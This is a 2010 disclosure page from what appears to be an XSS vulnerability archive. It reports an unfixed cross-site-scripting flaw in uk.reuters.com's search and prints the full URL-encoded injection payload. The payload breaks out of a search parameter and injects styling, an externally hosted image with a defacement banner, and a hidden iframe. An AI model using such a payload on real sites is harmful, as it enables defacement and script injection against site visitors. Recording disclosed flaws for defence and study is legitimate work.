uk.reuters.com cross-site-scripting (XSS) Vulnerability

Advertisements:

Security researcher TinKode, has submitted on 09/11/2010 a cross-site-scripting (XSS) vulnerability affecting uk.reuters.com, which at the time of submission ranked 310 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 10/11/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Date submitted: 09/11/2010

Date published: 10/11/2010

Fixed? Mail us!

Status:

UNFIXED

Author: TinKode

Domain: uk.reuters.com

Category: XSS

Pagerank: 310

URL: http://uk.reuters.com/search?blob=%22%3E%3Cstyle%3Ebody{%20background-color:%20Black;}%3C/style%3E%2
7%22%3E%3Cdiv%20style=%22position:%20absolute;left:%20420px;top:%2090px;z-index:%2010;visibility:%20
visible;%20color:%20black;%20font-size:%2040px;%22%3E%3Cimg%20src=%22http://i44.tinypic.com/9rlt95.g
if%22%3E%3Cbr%3EInSecurity.Ro%20-%20ISR%3Cbr%3ETinKode%3Ciframe%20src%20=http://www.youtube.com/watc
h?v=DKdsTKE6Izs%22%20width=%220%22%20height=%220%22%20\%3E%3C/div%3E

Click here to view the mirror

XSS Attacks
Cross Site Scripting Exploits and Defense

Website Fraud Loss Prevention